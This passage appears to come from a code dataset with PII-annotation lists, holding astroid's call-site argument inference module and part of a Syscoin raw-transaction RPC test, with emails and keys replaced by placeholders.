'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is']]" +75,"# Copyright (c) 2015-2016, 2018-2020 Claudiu Popa dummy@email.com +# Copyright (c) 2015-2016 Ceridwen dummy@email.com +# Copyright (c) 2018 Bryce Guinta dummy@email.com +# Copyright (c) 2018 Nick Drozd dummy@email.com +# Copyright (c) 2018 Anthony Sottile dummy@email.com +# Copyright (c) 2020 hippo91 dummy@email.com +# Copyright (c) 2021 Pierre Sassoulas dummy@email.com + +# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html +# For details: https://github.com/PyCQA/astroid/blob/master/LICENSE + + +from astroid import bases +from astroid import context as contextmod +from astroid import exceptions, nodes, util + + +class CallSite: + """"""Class for understanding arguments passed into a call site + + It needs a call context, which contains the arguments and the + keyword arguments that were passed into a given call site. + In order to infer what an argument represents, call :meth:`infer_argument` + with the corresponding function node and the argument name. + + :param callcontext: + An instance of :class:`astroid.context.CallContext`, that holds + the arguments for the call site. 
+ :param argument_context_map: + Additional contexts per node, passed in from :attr:`astroid.context.Context.extra_context` + :param context: + An instance of :class:`astroid.context.Context`. + """""" + + def __init__(self, callcontext, argument_context_map=None, context=None): + if argument_context_map is None: + argument_context_map = {} + self.argument_context_map = argument_context_map + args = callcontext.args + keywords = callcontext.keywords + self.duplicated_keywords = set() + self._unpacked_args = self._unpack_args(args, context=context) + self._unpacked_kwargs = self._unpack_keywords(keywords, context=context) + + self.positional_arguments = [ + arg for arg in self._unpacked_args if arg is not util.Uninferable + ] + self.keyword_arguments = { + key: value + for key, value in self._unpacked_kwargs.items() + if value is not util.Uninferable + } + + @classmethod + def from_call(cls, call_node, context=None): + """"""Get a CallSite object from the given Call node. + + :param context: + An instance of :class:`astroid.context.Context` that will be used + to force a single inference path. + """""" + + # Determine the callcontext from the given `context` object if any. + context = context or contextmod.InferenceContext() + callcontext = contextmod.CallContext(call_node.args, call_node.keywords) + return cls(callcontext, context=context) + + def has_invalid_arguments(self): + """"""Check if in the current CallSite were passed *invalid* arguments + + This can mean multiple things. For instance, if an unpacking + of an invalid object was passed, then this method will return True. + Other cases can be when the arguments can't be inferred by astroid, + for example, by passing objects which aren't known statically. + """""" + return len(self.positional_arguments) != len(self._unpacked_args) + + def has_invalid_keywords(self): + """"""Check if in the current CallSite were passed *invalid* keyword arguments + + For instance, unpacking a dictionary with integer keys is invalid + (**{1:2}), because the keys must be strings, which will make this + method to return True. Other cases where this might return True if + objects which can't be inferred were passed. + """""" + return len(self.keyword_arguments) != len(self._unpacked_kwargs) + + def _unpack_keywords(self, keywords, context=None): + values = {} + context = context or contextmod.InferenceContext() + context.extra_context = self.argument_context_map + for name, value in keywords: + if name is None: + # Then it's an unpacking operation (**) + try: + inferred = next(value.infer(context=context)) + except exceptions.InferenceError: + values[name] = util.Uninferable + continue + + if not isinstance(inferred, nodes.Dict): + # Not something we can work with. 
+ values[name] = util.Uninferable + continue + + for dict_key, dict_value in inferred.items: + try: + dict_key = next(dict_key.infer(context=context)) + except exceptions.InferenceError: + values[name] = util.Uninferable + continue + if not isinstance(dict_key, nodes.Const): + values[name] = util.Uninferable + continue + if not isinstance(dict_key.value, str): + values[name] = util.Uninferable + continue + if dict_key.value in values: + # The name is already in the dictionary + values[dict_key.value] = util.Uninferable + self.duplicated_keywords.add(dict_key.value) + continue + values[dict_key.value] = dict_value + else: + values[name] = value + return values + + def _unpack_args(self, args, context=None): + values = [] + context = context or contextmod.InferenceContext() + context.extra_context = self.argument_context_map + for arg in args: + if isinstance(arg, nodes.Starred): + try: + inferred = next(arg.value.infer(context=context)) + except exceptions.InferenceError: + values.append(util.Uninferable) + continue + + if inferred is util.Uninferable: + values.append(util.Uninferable) + continue + if not hasattr(inferred, ""elts""): + values.append(util.Uninferable) + continue + values.extend(inferred.elts) + else: + values.append(arg) + return values + + def infer_argument(self, funcnode, name, context): + """"""infer a function argument value according to the call context + + Arguments: + funcnode: The function being called. + name: The name of the argument whose value is being inferred. + context: Inference context object + """""" + if name in self.duplicated_keywords: + raise exceptions.InferenceError( + ""The arguments passed to {func!r} "" "" have duplicate keywords."", + call_site=self, + func=funcnode, + arg=name, + context=context, + ) + + # Look into the keywords first, maybe it's already there. + try: + return self.keyword_arguments[name].infer(context) + except KeyError: + pass + + # Too many arguments given and no variable arguments. + if len(self.positional_arguments) > len(funcnode.args.args): + if not funcnode.args.vararg and not funcnode.args.posonlyargs: + raise exceptions.InferenceError( + ""Too many positional arguments "" + ""passed to {func!r} that does "" + ""not have *args."", + call_site=self, + func=funcnode, + arg=name, + context=context, + ) + + positional = self.positional_arguments[: len(funcnode.args.args)] + vararg = self.positional_arguments[len(funcnode.args.args) :] + argindex = funcnode.args.find_argname(name)[0] + kwonlyargs = {arg.name for arg in funcnode.args.kwonlyargs} + kwargs = { + key: value + for key, value in self.keyword_arguments.items() + if key not in kwonlyargs + } + # If there are too few positionals compared to + # what the function expects to receive, check to see + # if the missing positional arguments were passed + # as keyword arguments and if so, place them into the + # positional args list. + if len(positional) < len(funcnode.args.args): + for func_arg in funcnode.args.args: + if func_arg.name in kwargs: + arg = kwargs.pop(func_arg.name) + positional.append(arg) + + if argindex is not None: + # 2. first argument of instance/class method + if argindex == 0 and funcnode.type in (""method"", ""classmethod""): + if context.boundnode is not None: + boundnode = context.boundnode + else: + # XXX can do better ? + boundnode = funcnode.parent.frame() + + if isinstance(boundnode, nodes.ClassDef): + # Verify that we're accessing a method + # of the metaclass through a class, as in + # `cls.metaclass_method`. 
In this case, the + # first argument is always the class. + method_scope = funcnode.parent.scope() + if method_scope is boundnode.metaclass(): + return iter((boundnode,)) + + if funcnode.type == ""method"": + if not isinstance(boundnode, bases.Instance): + boundnode = boundnode.instantiate_class() + return iter((boundnode,)) + if funcnode.type == ""classmethod"": + return iter((boundnode,)) + # if we have a method, extract one position + # from the index, so we'll take in account + # the extra parameter represented by `self` or `cls` + if funcnode.type in (""method"", ""classmethod""): + argindex -= 1 + # 2. search arg index + try: + return self.positional_arguments[argindex].infer(context) + except IndexError: + pass + + if funcnode.args.kwarg == name: + # It wants all the keywords that were passed into + # the call site. + if self.has_invalid_keywords(): + raise exceptions.InferenceError( + ""Inference failed to find values for all keyword arguments "" + ""to {func!r}: {unpacked_kwargs!r} doesn't correspond to "" + ""{keyword_arguments!r}."", + keyword_arguments=self.keyword_arguments, + unpacked_kwargs=self._unpacked_kwargs, + call_site=self, + func=funcnode, + arg=name, + context=context, + ) + kwarg = nodes.Dict( + lineno=funcnode.args.lineno, + col_offset=funcnode.args.col_offset, + parent=funcnode.args, + ) + kwarg.postinit( + [(nodes.const_factory(key), value) for key, value in kwargs.items()] + ) + return iter((kwarg,)) + if funcnode.args.vararg == name: + # It wants all the args that were passed into + # the call site. + if self.has_invalid_arguments(): + raise exceptions.InferenceError( + ""Inference failed to find values for all positional "" + ""arguments to {func!r}: {unpacked_args!r} doesn't "" + ""correspond to {positional_arguments!r}."", + positional_arguments=self.positional_arguments, + unpacked_args=self._unpacked_args, + call_site=self, + func=funcnode, + arg=name, + context=context, + ) + args = nodes.Tuple( + lineno=funcnode.args.lineno, + col_offset=funcnode.args.col_offset, + parent=funcnode.args, + ) + args.postinit(vararg) + return iter((args,)) + + # Check if it's a default parameter. 
+ try: + return funcnode.args.default_value(name).infer(context) + except exceptions.NoDefault: + pass + raise exceptions.InferenceError( + ""No value found for argument {arg} to {func!r}"", + call_site=self, + func=funcnode, + arg=name, + context=context, + ) +",12599,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015-2016'], ['DATE_TIME', '2018-2020'], ['PERSON', 'Claudiu Popa'], ['DATE_TIME', '2015-2016'], ['PERSON', 'Ceridwen'], ['PERSON', 'Nick Drozd'], ['PERSON', 'Anthony Sottile'], ['DATE_TIME', '2020'], ['PERSON', 'hippo91'], ['DATE_TIME', '2021'], ['PERSON', 'Pierre Sassoulas'], ['PERSON', 'callcontext = contextmod'], ['PERSON', 'kwonlyargs'], ['PERSON', 'boundnode'], ['PERSON', 'boundnode'], ['PERSON', 'lineno=funcnode.args.lineno'], ['PERSON', 'lineno=funcnode.args.lineno'], ['URL', 'https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html'], ['URL', 'https://github.com/PyCQA/astroid/blob/master/LICENSE'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'astroid.context.Ca'], ['URL', 'astroid.context.Co'], ['URL', 'astroid.context.Co'], ['URL', 'self.ar'], ['URL', 'callcontext.ar'], ['URL', 'callcontext.ke'], ['URL', 'self.ke'], ['URL', 'kwargs.it'], ['URL', 'astroid.context.Co'], ['URL', 'contextmod.In'], ['URL', 'contextmod.Ca'], ['URL', 'node.ar'], ['URL', 'node.ke'], ['URL', 'self.ke'], ['URL', 'contextmod.In'], ['URL', 'self.ar'], ['URL', 'value.in'], ['URL', 'exceptions.In'], ['URL', 'inferred.it'], ['URL', 'key.in'], ['URL', 'exceptions.In'], ['URL', 'nodes.Co'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'keywords.ad'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'contextmod.In'], ['URL', 'self.ar'], ['URL', 'nodes.St'], ['URL', 'arg.value.in'], ['URL', 'exceptions.In'], ['URL', 'exceptions.In'], ['URL', 'self.ke'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.va'], ['URL', 'funcnode.ar'], ['URL', 'exceptions.In'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.fi'], ['URL', 'arg.na'], ['URL', 'funcnode.args.kw'], ['URL', 'self.ke'], ['URL', 'arguments.it'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.ar'], ['URL', 'arg.na'], ['URL', 'arg.na'], ['URL', 'context.bo'], ['URL', 'context.bo'], ['URL', 'funcnode.parent.fr'], ['URL', 'nodes.Cl'], ['URL', 'cls.me'], ['URL', 'funcnode.parent.sc'], ['URL', 'boundnode.me'], ['URL', 'bases.In'], ['URL', 'boundnode.in'], ['URL', 'funcnode.args.kw'], ['URL', 'exceptions.In'], ['URL', 'self.ke'], ['URL', 'funcnode.args.li'], ['URL', 'funcnode.args.co'], ['URL', 'funcnode.ar'], ['URL', 'nodes.co'], ['URL', 'kwargs.it'], ['URL', 'funcnode.args.va'], ['URL', 'exceptions.In'], ['URL', 'funcnode.args.li'], ['URL', 'funcnode.args.co'], ['URL', 'funcnode.ar'], ['URL', 'funcnode.args.de'], ['URL', 'exceptions.No'], ['URL', 'exceptions.In']]" +76,"#!/usr/bin/env python3 +# Copyright (c) 2014-2020 The Bitcoin Core developers +# Distributed under the MIT software license, see the accompanying +# file COPYING or http://www.opensource.org/licenses/mit-license.php. +""""""Test the rawtransaction RPCs. 
+ +Test the following RPCs: + - createrawtransaction + - signrawtransactionwithwallet + - sendrawtransaction + - decoderawtransaction + - getrawtransaction +"""""" + +from collections import OrderedDict +from decimal import Decimal +from io import BytesIO +from test_framework.messages import CTransaction, ToHex +from test_framework.test_framework import SyscoinTestFramework +from test_framework.util import ( + assert_equal, + assert_raises_rpc_error, + find_vout_for_address, + hex_str_to_bytes, +) + + +class multidict(dict): + """"""Dictionary that allows duplicate keys. + + Constructed with a list of (key, value) tuples. When dumped by the json module, + will output invalid json with repeated keys, eg: + >>> json.dumps(multidict([(1,2),(1,2)])) + '{""1"": 2, ""1"": 2}' + + Used to test calls to rpc methods with repeated keys in the json object."""""" + + def __init__(self, x): + dict.__init__(self, x) + self.x = x + + def items(self): + return self.x + + +# Create one-input, one-output, no-fee transaction: +class RawTransactionsTest(SyscoinTestFramework): + def set_test_params(self): + self.setup_clean_chain = True + self.num_nodes = 3 + self.extra_args = [ + [""-txindex""], + [""-txindex""], + [""-txindex""], + ] + self.supports_cli = False + + def skip_test_if_missing_module(self): + self.skip_if_no_wallet() + + def setup_network(self): + super().setup_network() + self.connect_nodes(0, 2) + + def run_test(self): + self.log.info('prepare some coins for multiple *rawtransaction commands') + self.nodes[2].generate(1) + self.sync_all() + self.nodes[0].generate(101) + self.sync_all() + self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.5) + self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.0) + self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),5.0) + self.sync_all() + self.nodes[0].generate(5) + self.sync_all() + + self.log.info('Test getrawtransaction on genesis block coinbase returns an error') + block = self.nodes[0].getblock(self.nodes[0].getblockhash(0)) + assert_raises_rpc_error(-5, ""The genesis block coinbase is not considered an ordinary transaction"", self.nodes[0].getrawtransaction, block['merkleroot']) + + self.log.info('Check parameter types and required parameters of createrawtransaction') + # Test `createrawtransaction` required parameters + assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction) + assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction, []) + + # Test `createrawtransaction` invalid extra parameters + assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction, [], {}, 0, False, 'foo') + + # Test `createrawtransaction` invalid `inputs` + txid = 'PI:KEY' + assert_raises_rpc_error(-3, ""Expected type array"", self.nodes[0].createrawtransaction, 'foo', {}) + assert_raises_rpc_error(-1, ""JSON value is not an object as expected"", self.nodes[0].createrawtransaction, ['foo'], {}) + assert_raises_rpc_error(-1, ""JSON value is not a string as expected"", self.nodes[0].createrawtransaction, [{}], {}) + assert_raises_rpc_error(-8, ""txid must be of length 64 (not 3, for 'foo')"", self.nodes[0].createrawtransaction, [{'txid': 'foo'}], {}) + assert_raises_rpc_error(-8, ""txid must be hexadecimal string (not 'PI:KEY')"", self.nodes[0].createrawtransaction, [{'txid': 'PI:KEY'}], {}) + assert_raises_rpc_error(-8, ""Invalid parameter, missing vout key"", self.nodes[0].createrawtransaction, [{'txid': txid}], {}) + assert_raises_rpc_error(-8, ""Invalid
parameter, missing vout key"", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 'foo'}], {}) + assert_raises_rpc_error(-8, ""Invalid parameter, vout cannot be negative"", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': -1}], {}) + assert_raises_rpc_error(-8, ""Invalid parameter, sequence number is out of range"", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 0, 'sequence': -1}], {}) + + # Test `createrawtransaction` invalid `outputs` + address = self.nodes[0].getnewaddress() + address2 = self.nodes[0].getnewaddress() + assert_raises_rpc_error(-1, ""JSON value is not an array as expected"", self.nodes[0].createrawtransaction, [], 'foo') + self.nodes[0].createrawtransaction(inputs=[], outputs={}) # Should not throw for backwards compatibility + self.nodes[0].createrawtransaction(inputs=[], outputs=[]) + assert_raises_rpc_error(-8, ""Data must be hexadecimal string"", self.nodes[0].createrawtransaction, [], {'data': 'foo'}) + assert_raises_rpc_error(-5, ""Invalid Syscoin address"", self.nodes[0].createrawtransaction, [], {'foo': 0}) + assert_raises_rpc_error(-3, ""Invalid amount"", self.nodes[0].createrawtransaction, [], {address: 'foo'}) + assert_raises_rpc_error(-3, ""Amount out of range"", self.nodes[0].createrawtransaction, [], {address: -1}) + assert_raises_rpc_error(-8, ""Invalid parameter, duplicated address: %s"" % address, self.nodes[0].createrawtransaction, [], multidict([(address, 1), (address, 1)])) + assert_raises_rpc_error(-8, ""Invalid parameter, duplicated address: %s"" % address, self.nodes[0].createrawtransaction, [], [{address: 1}, {address: 1}]) + assert_raises_rpc_error(-8, ""Invalid parameter, duplicate key: data"", self.nodes[0].createrawtransaction, [], [{""data"": 'aa'}, {""data"": ""bb""}]) + assert_raises_rpc_error(-8, ""Invalid parameter, duplicate key: data"", self.nodes[0].createrawtransaction, [], multidict([(""data"", 'aa'), (""data"", ""bb"")])) + assert_raises_rpc_error(-8, ""Invalid parameter, key-value pair must contain exactly one key"", self.nodes[0].createrawtransaction, [], [{'a': 1, 'b': 2}]) + assert_raises_rpc_error(-8, ""Invalid parameter, key-value pair not an object as expected"", self.nodes[0].createrawtransaction, [], [['key-value pair1'], ['2']]) + + # Test `createrawtransaction` invalid `locktime` + assert_raises_rpc_error(-3, ""Expected type number"", self.nodes[0].createrawtransaction, [], {}, 'foo') + assert_raises_rpc_error(-8, ""Invalid parameter, locktime out of range"", self.nodes[0].createrawtransaction, [], {}, -1) + assert_raises_rpc_error(-8, ""Invalid parameter, locktime out of range"", self.nodes[0].createrawtransaction, [], {}, 4294967296) + + # Test `createrawtransaction` invalid `replaceable` + assert_raises_rpc_error(-3, ""Expected type bool"", self.nodes[0].createrawtransaction, [], {}, 0, 'foo') + + self.log.info('Check that createrawtransaction accepts an array and object as outputs') + tx = CTransaction() + # One output + tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs={address: 99})))) + assert_equal(len(tx.vout), 1) + assert_equal( + tx.serialize().hex(), + self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}]), + ) + # Two outputs + tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=OrderedDict([(address, 99), (address2, 99)]))))) + assert_equal(len(tx.vout), 2) + assert_equal( + tx.serialize().hex(), + 
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}, {address2: 99}]), + ) + # Multiple mixed outputs + tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=multidict([(address, 99), (address2, 99), ('data', '99')]))))) + assert_equal(len(tx.vout), 3) + assert_equal( + tx.serialize().hex(), + self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}, {address2: 99}, {'data': '99'}]), + ) + + for type in [""bech32"", ""p2sh-segwit"", ""legacy""]: + addr = self.nodes[0].getnewaddress("""", type) + addrinfo = self.nodes[0].getaddressinfo(addr) + pubkey = addrinfo[""scriptPubKey""] + + self.log.info('sendrawtransaction with missing prevtx info (%s)' %(type)) + + # Test `signrawtransactionwithwallet` invalid `prevtxs` + inputs = [ {'txid' : txid, 'vout' : 3, 'sequence' : 1000}] + outputs = { self.nodes[0].getnewaddress() : 1 } + rawtx = self.nodes[0].createrawtransaction(inputs, outputs) + + prevtx = dict(txid=txid, scriptPubKey=pubkey, vout=3, amount=1) + succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx]) + assert succ[""complete""] + if type == ""legacy"": + del prevtx[""amount""] + succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx]) + assert succ[""complete""] + + if type != ""legacy"": + assert_raises_rpc_error(-3, ""Missing amount"", self.nodes[0].signrawtransactionwithwallet, rawtx, [ + { + ""txid"": txid, + ""scriptPubKey"": pubkey, + ""vout"": 3, + } + ]) + + assert_raises_rpc_error(-3, ""Missing vout"", self.nodes[0].signrawtransactionwithwallet, rawtx, [ + { + ""txid"": txid, + ""scriptPubKey"": pubkey, + ""amount"": 1, + } + ]) + assert_raises_rpc_error(-3, ""Missing txid"", self.nodes[0].signrawtransactionwithwallet, rawtx, [ + { + ""scriptPubKey"": pubkey, + ""vout"": 3, + ""amount"": 1, + } + ]) + assert_raises_rpc_error(-3, ""Missing scriptPubKey"", self.nodes[0].signrawtransactionwithwallet, rawtx, [ + { + ""txid"": txid, + ""vout"": 3, + ""amount"": 1 + } + ]) + + ######################################### + # sendrawtransaction with missing input # + ######################################### + + self.log.info('sendrawtransaction with missing input') + inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1}] #won't exists + outputs = { self.nodes[0].getnewaddress() : 4.998 } + rawtx = self.nodes[2].createrawtransaction(inputs, outputs) + rawtx = self.nodes[2].signrawtransactionwithwallet(rawtx) + + # This will raise an exception since there are missing inputs + assert_raises_rpc_error(-25, ""bad-txns-inputs-missingorspent"", self.nodes[2].sendrawtransaction, rawtx['hex']) + + ##################################### + # getrawtransaction with block hash # + ##################################### + + # make a tx by sending then generate 2 blocks; block1 has the tx in it + tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress(), 1) + block1, block2 = self.nodes[2].generate(2) + self.sync_all() + # We should be able to get the raw transaction by providing the correct block + gottx = self.nodes[0].getrawtransaction(tx, True, block1) + assert_equal(gottx['txid'], tx) + assert_equal(gottx['in_active_chain'], True) + # We should have the 'in_active_chain' flag when we don't provide a block due to blockindexdb + gottx = self.nodes[0].getrawtransaction(tx, True) + assert_equal(gottx['txid'], tx) + # SYSCOIN + assert 'in_active_chain' in gottx + # We should not get the tx if we provide an unrelated block + 
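+# [Editor's note -- explanatory aside, not part of the original test file:
+# getrawtransaction with an explicit blockhash looks the transaction up in
+# that block directly (so it works even without -txindex) and reports the
+# in_active_chain flag; passing a block that does not contain the tx yields
+# the -5 error that the next assertion exercises.]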
assert_raises_rpc_error(-5, ""No such transaction found"", self.nodes[0].getrawtransaction, tx, True, block2) + # An invalid block hash should raise the correct errors + assert_raises_rpc_error(-1, ""JSON value is not a string as expected"", self.nodes[0].getrawtransaction, tx, True, True) + assert_raises_rpc_error(-8, ""parameter 3 must be of length 64 (not 6, for 'foobar')"", self.nodes[0].getrawtransaction, tx, True, ""foobar"") + assert_raises_rpc_error(-8, ""parameter 3 must be of length 64 (not 8, for 'abcd1234')"", self.nodes[0].getrawtransaction, tx, True, ""abcd1234"") + assert_raises_rpc_error(-8, ""parameter 3 must be hexadecimal string (not 'ZZZ0000000000000000000000000000000000000000000000000000000000000')"", self.nodes[0].getrawtransaction, tx, True, ""ZZZ0000000000000000000000000000000000000000000000000000000000000"") + assert_raises_rpc_error(-5, ""Block hash not found"", self.nodes[0].getrawtransaction, tx, True, ""0000000000000000000000000000000000000000000000000000000000000000"") + # Undo the blocks and check in_active_chain + self.nodes[0].invalidateblock(block1) + gottx = self.nodes[0].getrawtransaction(txid=tx, verbose=True, blockhash=block1) + assert_equal(gottx['in_active_chain'], False) + self.nodes[0].reconsiderblock(block1) + assert_equal(self.nodes[0].getbestblockhash(), block2) + + if not self.options.descriptors: + # The traditional multisig workflow does not work with descriptor wallets so these are legacy only. + # The multisig workflow with descriptor wallets uses PSBTs and is tested elsewhere, no need to do them here. + ######################### + # RAW TX MULTISIG TESTS # + ######################### + # 2of2 test + addr1 = self.nodes[2].getnewaddress() + addr2 = self.nodes[2].getnewaddress() + + addr1Obj = self.nodes[2].getaddressinfo(addr1) + addr2Obj = self.nodes[2].getaddressinfo(addr2) + + # Tests for createmultisig and addmultisigaddress + assert_raises_rpc_error(-5, ""Invalid public key"", self.nodes[0].createmultisig, 1, [""01020304""]) + self.nodes[0].createmultisig(2, [addr1Obj['pubkey'], addr2Obj['pubkey']]) # createmultisig can only take public keys + assert_raises_rpc_error(-5, ""Invalid public key"", self.nodes[0].createmultisig, 2, [addr1Obj['pubkey'], addr1]) # addmultisigaddress can take both pubkeys and addresses so long as they are in the wallet, which is tested here. 
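+# [Editor's note -- hedged illustration, not part of the original test file.
+# The duplicate-key assertions earlier in run_test() depend on the multidict
+# helper defined at the top of this file. The standalone sketch below shows
+# the trick in isolation; it assumes only the stdlib json module and that
+# json.dumps() serializes this dict subclass via its items() method, which
+# is the behavior the multidict docstring relies on.]
+import json
+
+class DupKeyDict(dict):
+    # Replaying the raw (key, value) list from items() lets json.dumps()
+    # emit deliberately invalid JSON with a repeated key -- exactly the
+    # malformed input the RPC layer is expected to reject.
+    def __init__(self, pairs):
+        dict.__init__(self, pairs)
+        self.pairs = pairs
+
+    def items(self):
+        return self.pairs
+
+print(json.dumps(DupKeyDict([('data', 'aa'), ('data', 'bb')])))
+# expected (per the multidict docstring): a JSON object with 'data' twice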
+ + mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr1])['address'] + + #use balance deltas instead of absolute values + bal = self.nodes[2].getbalance() + + # send 1.2 SYS to msig adr + txId = self.nodes[0].sendtoaddress(mSigObj, 1.2) + self.sync_all() + self.nodes[0].generate(1) + self.sync_all() + assert_equal(self.nodes[2].getbalance(), bal+Decimal('1.20000000')) #node2 has both keys of the 2of2 ms addr., tx should affect the balance + + + # 2of3 test from different nodes + bal = self.nodes[2].getbalance() + addr1 = self.nodes[1].getnewaddress() + addr2 = self.nodes[2].getnewaddress() + addr3 = self.nodes[2].getnewaddress() + + addr1Obj = self.nodes[1].getaddressinfo(addr1) + addr2Obj = self.nodes[2].getaddressinfo(addr2) + addr3Obj = self.nodes[2].getaddressinfo(addr3) + + mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey']])['address'] + + txId = self.nodes[0].sendtoaddress(mSigObj, 2.2) + decTx = self.nodes[0].gettransaction(txId) + rawTx = self.nodes[0].decoderawtransaction(decTx['hex']) + self.sync_all() + self.nodes[0].generate(1) + self.sync_all() + + #THIS IS AN INCOMPLETE FEATURE + #NODE2 HAS TWO OF THREE KEY AND THE FUNDS SHOULD BE SPENDABLE AND COUNT AT BALANCE CALCULATION + assert_equal(self.nodes[2].getbalance(), bal) #for now, assume the funds of a 2of3 multisig tx are not marked as spendable + + txDetails = self.nodes[0].gettransaction(txId, True) + rawTx = self.nodes[0].decoderawtransaction(txDetails['hex']) + vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('2.20000000')) + + bal = self.nodes[0].getbalance() + inputs = [{ ""txid"" : txId, ""vout"" : vout['n'], ""scriptPubKey"" : vout['scriptPubKey']['hex'], ""amount"" : vout['value']}] + outputs = { self.nodes[0].getnewaddress() : 2.19 } + rawTx = self.nodes[2].createrawtransaction(inputs, outputs) + rawTxPartialSigned = self.nodes[1].signrawtransactionwithwallet(rawTx, inputs) + assert_equal(rawTxPartialSigned['complete'], False) #node1 only has one key, can't comp. 
sign the tx + + rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx, inputs) + assert_equal(rawTxSigned['complete'], True) #node2 can sign the tx compl., own two of three keys + self.nodes[2].sendrawtransaction(rawTxSigned['hex']) + rawTx = self.nodes[0].decoderawtransaction(rawTxSigned['hex']) + self.sync_all() + self.nodes[0].generate(1) + self.sync_all() + assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx + + # 2of2 test for combining transactions + bal = self.nodes[2].getbalance() + addr1 = self.nodes[1].getnewaddress() + addr2 = self.nodes[2].getnewaddress() + + addr1Obj = self.nodes[1].getaddressinfo(addr1) + addr2Obj = self.nodes[2].getaddressinfo(addr2) + + self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address'] + mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address'] + mSigObjValid = self.nodes[2].getaddressinfo(mSigObj) + + txId = self.nodes[0].sendtoaddress(mSigObj, 2.2) + decTx = self.nodes[0].gettransaction(txId) + rawTx2 = self.nodes[0].decoderawtransaction(decTx['hex']) + self.sync_all() + self.nodes[0].generate(1) + self.sync_all() + + assert_equal(self.nodes[2].getbalance(), bal) # the funds of a 2of2 multisig tx should not be marked as spendable + + txDetails = self.nodes[0].gettransaction(txId, True) + rawTx2 = self.nodes[0].decoderawtransaction(txDetails['hex']) + vout = next(o for o in rawTx2['vout'] if o['value'] == Decimal('2.20000000')) + + bal = self.nodes[0].getbalance() + inputs = [{ ""txid"" : txId, ""vout"" : vout['n'], ""scriptPubKey"" : vout['scriptPubKey']['hex'], ""redeemScript"" : mSigObjValid['hex'], ""amount"" : vout['value']}] + outputs = { self.nodes[0].getnewaddress() : 2.19 } + rawTx2 = self.nodes[2].createrawtransaction(inputs, outputs) + rawTxPartialSigned1 = self.nodes[1].signrawtransactionwithwallet(rawTx2, inputs) + self.log.debug(rawTxPartialSigned1) + assert_equal(rawTxPartialSigned1['complete'], False) #node1 only has one key, can't comp. sign the tx + + rawTxPartialSigned2 = self.nodes[2].signrawtransactionwithwallet(rawTx2, inputs) + self.log.debug(rawTxPartialSigned2) + assert_equal(rawTxPartialSigned2['complete'], False) #node2 only has one key, can't comp. 
